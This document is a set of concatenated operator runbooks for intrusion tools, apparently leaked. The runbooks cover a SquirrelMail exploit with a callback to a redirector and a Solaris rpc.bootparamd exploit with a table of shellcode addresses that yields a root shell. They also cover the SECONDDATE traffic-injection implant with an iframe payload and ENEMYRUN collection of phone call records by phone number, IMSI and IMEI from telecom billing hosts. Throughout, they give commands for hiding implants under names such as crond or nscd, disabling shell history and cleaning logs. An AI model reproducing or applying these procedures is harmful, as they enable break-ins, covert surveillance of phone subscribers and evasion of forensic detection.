:%s/REDIRECTOR_IP/REDIRECTOR_IP/g
:%s/TARGET_IP/TARGET_IP/g
:%s/RANDOM_PORT/RANDOM_PORT/g
`x
### scan port 80 to look for squirrel banner ( may report version; needs to
### be version 1.4.0 - 1.4.7 to work)
### need banner to help determine squirrel mail dir
-scan http TARGET_IP
### local scripted window [[ note: the backticks "`" may or may not be necessar
y ]]
./elideskew.pl -u http://127.0.0.1/webapps/sq147 -l /current/up/morerats/noserv
er-3.0.3.6-i686.pc.linux.gnuoldld.redhat-6.0 -r /var/www/html/webapps/sq147/data
/nos -c '`D=-cREDIRECTOR_IP:RANDOM_PORT /var/www/html/webapps/sq147/data/nos`'
### if all goes well you will be apache on target (note: some apache configurati
ons run
as nobody)
need to elevate; choose appropriate tool
### cleaning logs
Logging varies by platform:
on CentOS - /var/log/httpd/error_log ; CentOS runs SELinux so it also logs when
nopen
tries to call back in /var/log/messages. CentOS will not allow nopen to
bind
to a port as a server so must use callback mode for nopen
on FreeBSD - [APACHE_PREFIX]/logs/error_log
###
### END File user.tool.elideskew.COMMON
### (see also ../etc/user.tool.elideskew.COMMON)
###
### BEGIN File user.tool.poptop.COMMON (see also ../etc/user.tool.poptop.COMMO
N)
###
### EncTelnet/Poptop
### To use Nopen over an existing connection (i.e. telnet)
### Window 1: Nopen Window - Setup tunnel to dude telnetting to
-tunnel
l 2323 DUDE 23
### Window 2: Local scripted window - Use spawn to be your telnet client
### The window will look kinda funny with debug telnet negotiation stuff
### going by, and you'll see the typed password in the clear...get over it
spawn.v3 127.0.0.1 2323 telnet
<login as usual, unsets, blah blah...>
### Window 3: Local window: prep poptop/noserver
cp TARGNOSERVER /current/up/nscd
cp TARGPOPTOP /current/up/crond
compress nscd crond
uuencode nscd.Z nscd.Z > nscd.uu
uuencode crond.Z crond.Z > crond.uu
### Window 2: Accept files for upload
uudecode
--p /current/up/nscd.uu
uudecode
--p /current/up/crond.uu
uncompress nscd.Z crond.Z
### Window 2: Run Nopen and poptop
chmod 700 nscd crond
PATH=. D=-lPORT nscd
PATH=. crond
### 1st prompt for "arg" is port
PORT
### 2nd prompt for "arg" is file descriptor, use 0 for stdin
0
### Should now get a line saying "tty is setup"
### Window 4: Local scripted window: setup for Nopen connect
noclient -l 8080
### Window 2: type "---" and hit enter, should
### have a connection in your noclient window then
---
### Window 4: To get multiple windows on target, will need use this window
### as a -tunnel window, and tunnel to yourself over loopback
### And oh yeah, remove the binaries
-rm crond nscd
-tunnel
l PORT 127.0.0.1
### In other scripted windows
noclient 127.0.0.1:PORT
### Do whatever you need to do...
### When all done...
-burnBURN
### Window 2: this window will now probably go nuts, ^C will
### take you back to your op box shell prompt, and officially
### close your telnet connection (see connection close in your
### Window 1 -tunnel window).
### Note that there will be another log entry put into
### wtmp that cannot be toasted away, should not be seen by admins though...
EOF
###
### END File user.tool.poptop.COMMON
### (see also ../etc/user.tool.poptop.COMMON)
###
### BEGIN File user.tool.seconddate.COMMON (see also ../etc/user.tool.secondda
te.COMMON)
###
# SECONDDATE
:syntax on
#########
# SET UP
#########
# get tasking directories and put them on media
# check op plan for correct tasking date
/projects/web_proxy_tasking/to_lowside/YYYYMMDD/YYYYMMDD.HH.MM.SS-IP_ADDRESS
# copy and extract binaries to /current/bin
mz
cp /mnt/zip/seconddate_tools.tar /current/bin
cd /current/bin
tar xvf /seconddate_binaries.tar
# copy tasking directories to /current/bin/sd and extract
cp -r /mnt/zip/TASKING /current/bin/sd
cd /current/bin/sd
# copy the SECONDDATE command and control binary to each tasking directory
# the rules are set by relative path;
# the command and control binary needs to be in the same path as the inject and
regex files
# tasking directory name format: YYYYMMDD.HH.MM.SS-IP_ADDRESS
# inject tag name format: YYYYMMDDHHMMSS-IP_ADDRESS-inject-<number>.bin
# regex file name format: YYYYMMDDHHMMSS-IP_ADDRESS-regex-<number>.bin
cp /current/bin/sd/1.1.1.1/Binaries/Seconddate_CnC /current/bin/sd/YYYYMMDD.HH.M
M.SS-IP_ADDRESS
#################
# PREP COMMANDS
#################
# all commands to run at local Seconddate_CnC prompt are in commands.txt
# you should have already copied it here:
# /current/bin/sd/YYYYMMDD.HH.MM.SS-IP_ADDRESS/commands.txt
cd /current/bin/sd/YYYYMMDD.HH.MM.SS-IP_ADDRESS
egrep "disable" commands.txt > disable.txt
egrep "rule" commands.txt | egrep -v "showrule --all" > rules.txt
egrep "enable" commands.txt > enable.txt
# open command files in gedit text editor; xemacs works too; vi doesn't work
gedit disable.txt &
# open the other files rules.txt and enable.txt
####################
# CONNECT TO IMPLANT
###################
# local_port - listen on this port locally; i.e. the ops box; pick a random p
ort
# target_ip - ip of target that is running SECONDDATE to which you want to c
onnect
# target_port - port to which you'll connect to target; can be the same as loc
al_port
mx
:%s/LOCAL_UDP_PORT/LOCAL_UDP_PORT/g
:%s/TARGET_IP/TARGET_IP/g
:%s/TARGET_UDP_PORT/TARGET_UDP_PORT/g
`x
# set up UDP tunnel from redirector; won't work locally on target box
# u <random_local_port> <target_ip> <random_target_port>
-tunnel
u LOCAL_UDP_PORT TARGET_IP TARGET_UDP_PORT
# in locally scripted window
# run CnC
# ./Seconddate_CnC 127.0.0.1 <udp tunnel port>
cd /current/bin/sd/YYYYMMDD.HH.MM.SS-IP_ADDRESS
./Seconddate_CnC 127.0.0.1 LOCAL_UDP_PORT
# run command
ping
# should recieve an 'OK'
# if you can't get an OK, the target may have rebooted; tool only runs in memory
# connect to the target via -irtun and check to see if SECONDDATE is running
# if it's not running you need to deploy
ps -ef | grep IMPLANT_FILENAME
cd /dev; ps -ef | grep IMPLANT_FILENAME
##############
# RUN COMMANDS
#############
# help menu
?
#or
help
# do these first
ping
# synopsis of rules and injects
getinfo
# check rule log
getlog
# show all rules
showrule --all
# have gedit window with rules commands available
# if you still have gedit open with the commands files, go to the disable comman
ds section below
# if you closed it after setup, reopen the commands files with gedit
# command files you previously set up are here including the commands.txt file:
# /current/bin/sd/YYYYMMDD.HH.MM.SS-IP_ADDRESS
# open command files in gedit text editor; xemacs works too; vi doesn't work
cd /current/bin/sd/YYYYMMDD.HH.MM.SS-IP_ADDRESS
gedit disable.txt &
# open the other files rules.txt and enable.txt from within gedit
# run disable commands only for enabled rules you know are going to change
# otherwise, disable all of the rules
# disable commands are in the file disable.txt
# clear log only if instructed to do so
# will fail if any rules are enabled
clearlog
# set rules; make sure the rules in rules.txt match what is on target
# rule commands are in the file rules.txt
# enable rules; watch for "Enabled: yes" in each rule displayed
# enable commands are in the file enable.txt
# show all rules
showrule --all
# check for empty rule enabled:
getinfo
# if the matches/hits/injects are increasing rapidly, then you probably enabled
an empty rule
# find the emtpy rule that's enabled
getlog
# look for the rule that has the most hits
# disable it and display it with showrule
# done
exit
# copy script files
# when finished with locally scripted window, type exit, or type CTL-D only once
# this reveals the name of the script file
cp script.<some_number> script.<target_ip>.seconddate.log
# you can remove the original script if you like
#########
# DEPLOY
#########
# if the target box rebooted, you'll have to deploy the tool
# connect via -irtun
# hidden_dir - hidden directoy on the target
# INCISION targets will have a manually created hidden d
irectory
# STOICSURGEON targets can run SECONDDATE from the STOIC
SURGEON directory
# sd_binary _path - where the SECONDATE binaries are lcoated on the ops bo
x:
# /current/bin/sd/1.1.1.1/Binaries
# implant_filename - what you want to call the SECONDDATE binary on target
mx
:%s:HIDDEN_DIR:HIDDEN_DIR:g
:%s/SD_BINARY_PATH/SD_BINARY_PATH/g
:%s/IMPLANT_FILENAME/IMPLANT_FILENAME/g
`x
# INCISION targets; skip if STOICSURGEON
# create hidden directory on linux target if you don't have one already
# mkdir -p /tmp/.<name_of_dir_to_hide>; __HMODE__=enable touch /tmp/.<name_ofdir
_to_hide>
# try to use a drectory name that blends in on teh target
# example:
# mkdir -p /tmp/.orbit561; __HMODE__=enable touch /tmp/.orbit561
mkdir -p HIDDEN_DIR; __HMODE__=enable touch HIDDEN_DIR
# make sure the directory was created
-ls HIDDEN_DIR
# make sure the directory is hidden
# you should not see the hidden directory
cd /dev; ls -al HIDDEN_DIR
# cd to hidden directory
# STOICSURGEON targets can run SECONDDATE from the STOICSURGEON directory
# INCISION targets run from hidden directory
# -cd /tmp/.orbit561
-cd HIDDEN_DIR
# put up tool
# -put <tool_location_opsbox> <tool_name_on_target>
# example
# -put /current/bin/sd/1.1.1.1/Binaries/Seconddate_Implant crond
-put SD_BINARY_PATH IMPLANT_FILENAME
##################
# START SECONDDATE
##################
# look for setsid
which setsid
# or
locate setsid
# run:
setsid /bin/bash -c 'PATH="." crond' > /dev/null 2>&1 &
# or, if there's no setsid
# -shell
# PATH=. crond
-shell
PATH=. IMPLANT_FILENAME
# Ctrl-D to get out of shell and get your NOPEN prompt
# be careful
# if there's no setsid, get noserver pid (parent of nopen pid)
# you'll have to kill the root noserver later when getting off target
# i.e. the parent pid of the nopen window you're in
-pid
# INCISION targets make sure it's hidden
# annotate pid of running implant in your opnotes
# cd /dev; ps -ef | grep crond
cd /dev; ps -ef | grep IMPLANT_FILENAME
# remove implant
# -rm crond
-rm IMPLANT_FILENAME
# in locally scripted window
# run CnC
./Seconddate_CnC 127.0.0.1 LOCAL_UDP_PORT
# help menu
help
# ping
ping
###############
# LEAVE RUNNING
###############
# may want to leave implant running and come back later
# if implant is left running exit from the CnC tool
exit
# check lastlog for reboot frequecy
last -100 | egrep "hutdow|eboo"
# INCISION targets make sure the running implant is hidden
# cd /dev; ps -ef grep <implant_filename>
cd /dev; ps -ef grep IMPLANT_FILENAME
###########
# UNINSTALL
###########
# to stop running implant in preparation for leaving target box
# in local CnC window that's scripted, uninstall the implant
uninstall
# in NOPEN window
# check process list; make it's not hung; if hung, kill it
kill -9 <implant_pid>
##########
# FINISHED
##########
# getting ready to get off the target
# to burn or not to burn?
# read all lof the following before getting off target
# if you're not leaving the implant running after getting off the target:
# - make sure you uninstall the implant as stated above
# - ensure it not hung; if so, kill it
# - then burn
#
# if you're on target under a noserver that did not spawn the implant
# process you may burn, i.e. the implant process is not the child
# of the noserver process
#
# if you ran the implant using 'setsid', you may also burn:
-burn
# if you ran the implant under your present noserver and wish to leave it
# running, you need to make sure the implant continues when done with target
# if there was no 'setsid' on the target box when you ran the implant:
# - kill the noserver that is listening under which you started the implant
# if you burn in this case the implant process will be killed
kill -9 <noserver_pid>
# - use "-exit" to get out of all nopen windows
-exit
# check your connection to the implant from the redirector next to the
# target running the implant
# run a few commands
ping
getinfo
# if connection is OK then you're done
ping
# should recieve an 'OK'
# if you can't connect to the implant
# get back up on target and check to see if implant is still running
# if the implant is not running you may have missed something when running
# the implant or disconnecting
# put it back up and run it again
# if you can't connect and the implant is running try troubleshooting
# the ports you're using
# copy script files
# when finished with locally scripted window, CTL-D only once
# this reveals the name of the script file
cp script.<some_number> script.<target_ip>.seconddate.log
# you can remove the original script if you like
#///////////////////////////////
# TASKING BY HAND - THE OLD WAY
#//////////////////////////////
#############
# INJECT FILE
#############
# configure inject file
# you will need to have a file containing the data for the inject packet
# first the http info:
# then the tag followed by 2 carriage retruns
# example
<inject_file_begin>
HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache,no-store
<html><meta http-equiv="refresh" content="0"><body><iframe src="<REPLACE_WITH_UR
L_TO_USE>"height="1" width="1" scrolling="no" frameborder="0" unselectable="yes"
marginheight="0" marginwidth="0"></iframe></body></html>
<inject_file_end>
#####################
# REGULAR EXPRESSIONS
#####################
# regular expression file
# needed to pass to implant as argument when using regex in a rule
# can't have any carriage returns or newlines in the file
# it must only contain the characters relative to the regex
# use vi or echo:
vi -b -c "set noeol" <filename>
# or
echo -n <regex> > <filename>
#######
# RULES
#######
# set rule
# rule 1 --srcaddr <target_network_address> --srcmask 255.255.255.0 --dstport 80
--maxinjections 10 --injectwindow 600 --nocheckregex --injectfile pkt
# examples:
rule 1 --dstport 80 --maxinjections 2 --injectwindow 600 --regexfile <regex_file
_1> --injectfile pkt
rule 2 --dstport 80 --maxinjections 2 --injectwindow 600 --regexfile <regex_file
_2> --injectfile pkt
# showrule
showrule 1
# to show all rules you'll have to wait a bit
# the tool will iterate through all 64 whether emtpy or not
# enable rule(s)
# you have to enable them individually
enable rule 1
# check for hits
getinfo
# check log
getlog
# when done disable rules
disable 1
# get last dump of log
getlog
# clear log
clearlog
###
### END File user.tool.seconddate.COMMON
### (see also ../etc/user.tool.seconddate.COMMON)
###
### BEGIN File user.tool.ebbisland.COMMON (see also ../etc/user.tool.ebbisland
.COMMON)
###
EBBISLAND
(Exploit for Solaris 2.6, 2.7, 2.8, 2.9 and 2.10)
First ensure that the vulnerable rpc service(bootparam) is running. You must
be able to reach the target system's TCP port that the designated target RPC
is listening upon.
Example
$ rpcinfo -p <target system>
program vers proto port service
100000 4 tcp 111 rpcbind
100000 3 tcp 111 rpcbind
100000 2 tcp 111 rpcbind
100000 4 udp 111 rpcbind
100000 3 udp 111 rpcbind
100000 2 udp 111 rpcbind
100232 10 udp 32772 sadmind
100083 1 tcp 32771
100221 1 tcp 32772
100068 2 udp 32773
100068 3 udp 32773
100068 4 udp 32773
100249 1 tcp 32782
100026 1 udp 32800 bootparam
100026 1 tcp 32790 bootparam
********************************************************************************
**************
EBBISLAND USAGE.
ebbisland: (-A <address>) Shellcode address
ebbisland: (-C) /core file overwriter/scrambler. This option throws the attack,
but uses pseudo-random binary data in place of the actual shellcode, to produce
a /core file free of suspicious content. This would be used in the case where EB
BISLAND failed to successfully exploit the target, and the operator wanted to tr
y and "purify" the file left in /core before quitting.
ebbisland: (-c <procnum>) Procedure number. Defaults to 0.
ebbisland: (-D) For and extra dummy connection
ebbisland: (-N) Use for non-inetd started services (i.e. rpc.bootparamd)
ebbisland: (-M <mtu>) Choose size of data part of packet to send. Default is 12
60. This could effect the landing zone size.
ebbisland: (-P <prog>) Optional prog to exec, re-using exploit socket.
ebbisland: (-r <prognum>) RPC program number
ebbisland: (-s <source port>)
ebbisland: (-V) Provides verbose outputs, where appropriate and desired.
ebbisland: (-X | -F) -X For indirect/xdr_replymsg programs, and -F for others
********************************************************************************
***********
Table of Exploit addresses for rpc.bootparamd (SPARC)
100026 rpc.bootparamd 2.6 -X -N 0x641a0
100026 rpc.bootparamd 2.7 -X -N (earlier) 0x65798
100026 rpc.bootparamd 2.7 -X -N (earlier) 0x6d8d8
100026 rpc.bootparamd 2.8 -X -N 0x7c760
100026 rpc.bootparamd 2.9 -X -N 0x6e908
100026 rpc.bootparamd 2.10 -X -N 0x68318
********************************************************************************
*************
Redirector:
-tunnel
l <RHP> <TARGET IP> <BOOTPARAM_TCP_PORT>
Example:
l 32794 10.40.1.2 32790
Exploit:
./ebbisland -t <REDIRECTOR_IP> -p <REDIRECTOR_PORT> -r <TARGET_RPC.BOOTPARAMD_PR
OGRAMNUMBER> -X -N -A <SPECIFIC_SHELLCODE_ADDRESS>
Example against Solaris 2.9:
./ebbisland -t 127.0.0.1 -p 32794 -r 100026 -X -N -A 0x6e908
********************************************************************************
**
Exploit will provide ROOT shell access.
unset HISTSIZE
unset HISTFILESIZE
unset HISTFILE
w
pwd
id
which uudecode uncompress
cd /tmp
mkdir .scsi
cd .scsi
# locally
packrat RAND_PORT
<ctrl><c> # packrat command
gedit /current/up/sendmail.Z.uu
# Target
/usr/bin/uudecode; ls -latr
select all/copy gedit contents into Target exploit window
uncompress sendmail.Z
ls -l
chmod 700 sendmail
PATH=. sendmail
# from redirector
-nstun TARGET_IP (EnJOY)
*******************************************************************************
CLEANING.
* The correct EBBISLAND attack for the remote target architecture must be u
sed, or else the attack will fail, and the chosen TCP RPC daemon
will likely (1) abort and /core dump, and (2) log heavily. If this should occur,
a /core file will be left on the remote system. This /core file
will contain our attack data buffers, including "shellcode". The technique could
then be reverse engineered and developed into an attack. That's
why we have the '-C' option...please rerun the attack, and generate 1 more /core
file, containing our semi-innocuous pseudo-random shellcode data.
# Logging considerations: Quite a few log messages will be generated on the targ
et as each subsequent attack attempt fails, most likely written to the /var/adm/
messages file. These could include messages similar to...
Sep 27 14:37:23 target inetd[146]: [ID 858011 daemon.warning] /platform/SUNW,Ult
ra-Enterprise-10000/lib/dr_daemon: Illegal Instruction
Sep 27 14:37:24 target dr_daemon[23501]: [ID 629332 daemon.notice] dr_daemon att
empting AP interaction
Sep 27 14:37:24 target dr_daemon[23501]: [ID 264428 daemon.error] ld.so.1: dr_da
emon: fatal: libap.so: open failed: No such file or directory
Sep 27 14:37:24 target dr_daemon[23501]: [ID 355200 daemon.error] dr_daemon oper
ating in NO AP interaction mode
Sep 27 14:37:24 target dr_daemon[23501]: [ID 309875 daemon.notice] NOTICE: recov
ered old state file '/tmp/.dr_extra_info'
Sep 27 14:43:10 target inetd[146]: [ID 858011 daemon.warning] /usr/openwin/bin/k
cms_server: Illegal Instruction - core dumped
Sep 27 14:43:11 target inetd[146]: [ID 858011 daemon.warning] /usr/openwin/bin/k
cms_server: Segmentation Fault - core dumped
Sep 27 14:43:13 target last message repeated 1 time
Sep 27 14:43:14 target inetd[146]: [ID 858011 daemon.warning] /usr/openwin/bin/k
cms_server: Illegal Instruction - core dumped
Sep 27 14:43:15 target inetd[146]: [ID 858011 daemon.warning] /usr/openwin/bin/k
cms_server: Segmentation Fault - core dumped
Sep 27 14:43:17 target last message repeated 2 times
Sep 27 14:43:55 target inetd[146]: [ID 858011 daemon.warning] /usr/sbin/rpc.meta
d: Illegal Instruction - core dumped
Sep 27 14:43:56 target inetd[146]: [ID 858011 daemon.warning] /usr/sbin/rpc.meta
d: Bus Error - core dumped
Sep 27 14:43:57 target inetd[146]: [ID 858011 daemon.warning] /usr/sbin/rpc.meta
d: Segmentation Fault - core dumped
###
### END File user.tool.ebbisland.COMMON
### (see also ../etc/user.tool.ebbisland.COMMON)
###
### BEGIN File user.tool.enemyrun.COMMON (see also ../etc/user.tool.enemyrun.C
OMMON)
###
##################
#### ENEMYRUN ####
##################
## copy and paste this into the window if you want syntax highlighting:
## it makes scripts a bit easier to read
:syntax on
##############
## ER SETUP ##
##############
##
## only get an encryption key value, if you don't already have one, ask first
##
#md5sum /current/down/tcpdump.raw
##
## vi Search/Replace commands:
## projectName - self explanatory, all CAPS
## date field - today's date, used for output files
## hostname.ip - hostname of the box and IP address exactly as displayed in nop
en window title bar
## or as seen in /current/down
## cryptkey - encryption key (already have one, or use output from below md5
sum command)
##
mx
:%s/PROJECTNAME/PROJECTNAME/g
:%s/DDMonYY/DDMonYY/g
:%s/HOSTNAME.IP/HOSTNAME.IP/g
:%s/CRYPTKEY/CRYPTKEY/g
'x
##
## copy the ER directory "er_PROJECTNAME" from the project's /targets/<proj_name
>/sustained directory
## to /current/down and make sure there are no tarballs in /current/down
##
mz
cp -r /mnt/zip/er_PROJECTNAME /current/down
cd /current/down/er_PROJECTNAME
uz
##
## save the encryption key locally in /current/down
## whether you have a new or old key:
##
echo CRYPTKEY > /current/down/cryptkey.enemyrun.DDMonYY
## copy key to ER directory if creating a new key
echo CRYPTKEY > /current/down/er_PROJECTNAME/cryptkey.enemyrun.DDMonYY
##
## implant hidden directory for script commnads
## location is implant dependent
## INCISION:
## Solaris - /platform/SUNW,SystemEngine/kernel/drv
## Linux - (hidden independently; check old opnotes)
## STOICSURGEON: (hidden directory is displayed at beginning of FTSHELL/ish
callback)
## no trailing /
##
mx
:%s:IMPLANT_HIDDEN_DIRECTORY:IMPLANT_HIDDEN_DIRECTORY:g
'x
##
## prepare files containing numbers to search for:
## if files containing the numbers to search available:
##
mkdir /current/down/argfiles
cd /current/down/argfiles
mz
cp /mnt/zip*/PROJECTNAME/arg* /current/down/argfiles
ls -altr
##
## prep the argfiles:
## make sure the files are ASCII and contain NO EMPTY LINES!!
## make sure the last line does not contain a null character at the end
## (vi the file, add a carriage return to the last line, then delete the emp
ty
## line and save)
## "file" results:
## this will not work: ASCII text, with CRLF line terminators
## this WILL: ASCII text
##
cat arg*
file arg*
dos2unix arg*
file arg*
##
## if no data media is provided:
## locally, create a file of numbers to grep for with each number on a separate
line
## make sure there are NO EMPTY LINES!!!!
## Format of each type of argument:
## p123456789 - phone number
## s123456789 - IMSI
## e123456789 - IMEI
## c123/456 - Cell/LAC (no leading 0's)
##
cd /current/down/argfiles
vim /current/down/argfiles/argfile1.txt
##
## encrypt argfiles / target files
##
## encrypt the ascii list...first make sure you have the encryption tool:
which cryptTool.v1.0.Linux2.4.18-14.targetdl
## if cryptTool not in PATH, change your PATH or insert full path in command
## to encrypt one at a time...skip to next comment to encrypt all at once:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile1.txt -o argfile1.enc -k CRYPTK
EY -b
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile2.txt -o argfile2.enc -k CRYPTK
EY -b
## to encrypt all at the same time:
for i in argfile* ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename
$i .txt`.enc -k CRYPTKEY -b ; done
ls -l
file argfile*.enc
##
## on target look at CDR directories:
## - use the following commands to determine the location of current CDR data st
orage
## - once you identify the location of the data, you'll use the head/tail comman
ds
## to determine the date ranges being saved
## - these date ranges will be used as settings in the ER configuration file(s)
##
##
## typical file locations per host:
##
######################### aromaseal:
######################### desertvista:
-lt /var/archive/output_billing
-vget /var/archive/output_billing/MoveData.sh
######################### diamondaxe:
########################## editionhaze:
## billing02 10.100.10.140
ls -latr /d08/saba/CDR/out/MS* | head -10
ls -latr /d08/saba/CDR/out/MS* | tail -10
ls -latr /d08/saba/CDR/out/MS* | wc -l
########################## liquidsteel:
########################## serenecosmos:
ls -latr /var/opt/archive/tape/*/*_S_*.gz | head -10
ls -latr /var/opt/archive/tape/*/*_S_*.gz | tail -10
########################## sicklestar:
## magnum: CURSEHAPPY not working on all SS .usd files :-(
## Try these first, should be all of them in one spot
ls -latr /usd_archive/mc_storage/*usd | head -10
ls -latr /usd_archive/mc_storage/*usd | tail -10
## if none in previous ones...
ls -latr /sys1/var/billing/out_coll/*usd | head -10
ls -latr /sys1/var/billing/out_coll/*usd | tail -10
ls -latr /sys1/var/alcatel/out_coll/*usd | head -10
ls -latr /sys1/var/alcatel/out_coll/*usd | tail -10
ls -latr /sys1/var/billing/msc_is2 | tail -20
######################### qualitygel:
########################## wholeblue:
## tpmw01 10.3.4.55
## tpmw02 10.3.4.56
## verifies isb, khi, and lhr directories:
ls -ld /tp/med/datastore/collect/siemens_msc_*
ls -ld /tp/med/datastore/collect/siemens_msc_*/.tmp_ncr
ls -ld /tp/med/archive/collect/siemens_msc_*
ls -ld /tp/med/archive/collect/siemens_msc_*/.tmp_ncr
## shows oldest and newest files in directories:
ls -latr /tp/med/datastore/collect/*isb*/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*isb*/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*khi*/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*khi*/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*lhr*/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*lhr*/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*isb*/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*isb*/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*khi*/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*khi*/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*lhr*/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*lhr*/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_isb01/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_isb01/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_khi01/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_khi01/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_lhr01/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_lhr01/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_isb01/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_isb01/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_khi01/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_khi01/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_lhr01/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_lhr01/.tmp_ncr/*.MSC | tail -10
## isbapro1 10.5.7.51
## nothing new
-lt /u01/product_evdp/evident/data_store/collect
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc | head -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc | tail -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_khi01 | head -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_khi01 | tail -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_isb01 | head -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_isb01 | tail -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_lhr01 | head -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_lhr01 | tail -
10
-lt /u03/archive/collect
## newer stuff
ls -latr /u03/archive/collect/siemens_msc_isb01 | head -10
ls -latr /u03/archive/collect/siemens_msc_isb01 | tail -10
ls -latr /u03/archive/collect/siemens_msc_isb01 | wc -l
## old stuff:
ls -latr /u03/archive/collect/siemens_msc_khi01 | head -10
ls -latr /u03/archive/collect/siemens_msc_khi01 | tail -10
#############
## COLLECT ##
#############
##
## cd to hidden directory where ENEMYRUN is set up
## when in the hidden directory, there could be two subdirectories;
## one for a forward instance and one backward (e.g. erf and erb)
##
-cd IMPLANT_HIDDEN_DIRECTORY
##
## there should be files in:
## er*/aux_*/output/final
## and possibly if parsing is occuring:
## er*/aux_*/output
##
-ls -R er*
-ls -R IMPLANT_HIDDEN_DIRECTORY/er*
##
## stop current instances on ENEMYRUN
## need name of process ENEMYRUN is running as on target; should be on plan, or
check old opnotes
## ER_PROCESS_NAME: name under which ENEMYRUN is running on target; try nscd whi
ch will look like ./nscd
##
#ps -ef | grep ENEMYRUN_PROCESS_NAME
ps -ef | grep nscd
## kill with SIGTERM; if it doesn't work use kill -9
## ENEMYRUN_PID: process id under which ENEMYRUN is running on target
kill -15 ENEMYRUN_PID
##
## collect parsed CDRs and logs created from the backward directory
## files are encrypted
##
-get IMPLANT_HIDDEN_DIRECTORY/er*/aux_*/output/final/*
-get IMPLANT_HIDDEN_DIRECTORY/er*/logs/final/log*
## in a local window make sure you have them all:
ls -laR /current/down/HOSTNAME.IPIMPLANT_HIDDEN_DIRECTORY/er*
##
## clean ER directories
##
## remove parsed CDRs
rm -fr IMPLANT_HIDDEN_DIRECTORY/er*/aux_*/output/final/*
## remove old logs
rm -f IMPLANT_HIDDEN_DIRECTORY/er*/logs/final/log*
## remove the status.log file >>>ONLY<<< from the >>>BACKWARDS<<< directory
rm -f IMPLANT_HIDDEN_DIRECTORY/erb/status.log
-ls -R er*
-ls -R IMPLANT_HIDDEN_DIRECTORY/er*
##
## edit ER configuration files
##
## in a local window
cd /current/down/er_PROJECTNAME
## find ER configs
ls -la er_conf*.txt
## should usually not have to edit the forward config, er_conf_fwd*.txt
## edit the backwards config, er_conf_bwd*.txt
vi er_conf_bwd.txt
## probably have to change START_DAY and STOP_DAY
## START_DAY: YYYYMMDD # day backwards in time from which to start
## STOP_DAY: YYYYMMDD # day forwards from START_DAY: to stop
## make sure you've made date range changes, or any other changes,
## to the plaintext ER configuration files and save
##
## encrypt required ER files
##
## encrypt the ER backwards configuration file
cd /current/down/er_PROJECTNAME
cryptTool.v1.0.Linux2.4.18-14.targetdl -i /current/down/er_PROJECTNAME/er_conf_b
wd.txt -o /current/down/er_PROJECTNAME/er_conf_bwd.enc -k CRYPTKEY -b
## encrypt the ER forwards configuration file
cryptTool.v1.0.Linux2.4.18-14.targetdl -i /current/down/er_PROJECTNAME/er_conf_f
wd.txt -o /current/down/er_PROJECTNAME/er_conf_fwd.enc -k CRYPTKEY -b
file /current/down/er_PROJECTNAME/er_conf_*.enc
## --------------- ##
## BACKWARDS FILES ##
## --------------- ##
##
## put up encrypted files
##
## encrypted argfile(s)
-put /current/down/argfiles/argfile1.enc IMPLANT_HIDDEN_DIRECTORY/erb/adm1
## copy adm1 for each aux_* directory you see
## e.g. if you see aux_1 aux_2 aux_3 then:
## cp adm1 adm2
## cp adm1 adm3
## encrypted ER configuration file
-put /current/down/er_PROJECTNAME/er_conf_bwd.enc IMPLANT_HIDDEN_DIRECTORY/erb/e
cb
##
## start ENEMYRUN
## may not work w/ PATH=.
## CRYPTKEY must be the same as in the ER configuration file
##
-cd IMPLANT_HIDDEN_DIRECTORY/erb
L='-I ecb -k CRYPTKEY'; export L; ./nscd
#ps -ef | grep ENEMYRUN_PROCESS_NAME
ps -ef | grep nscd
## record ER process pid(s) in opnotes
## DDMonYY
## backward ENEMYRUN_PROCESS_NAME
## pid:
ps -ef | grep ENEMYRUN_PID
## the argfile(s) should no longer be in the erb directory after ER is running
## if the parser has started, these files should grow
## logs IMPLANT_HIDDEN_DIRECTORY/erb/aux_1/output/<prefix>Log.*
## hits IMPLANT_HIDDEN_DIRECTORY/erb/aux_1/output/<prefix>.*
-ls -R erb
-ls -R IMPLANT_HIDDEN_DIRECTORY/erb
## -------------- ##
## FORWARDS FILES ##
## -------------- ##
##
## put up encrypted files
##
## encrypted argfile(s)
-put /current/down/argfiles/argfile1.enc IMPLANT_HIDDEN_DIRECTORY/erf/adm1
## or
-put /current/down/argfiles/argfile_forward.enc IMPLANT_HIDDEN_DIRECTORY/erf/adm
1
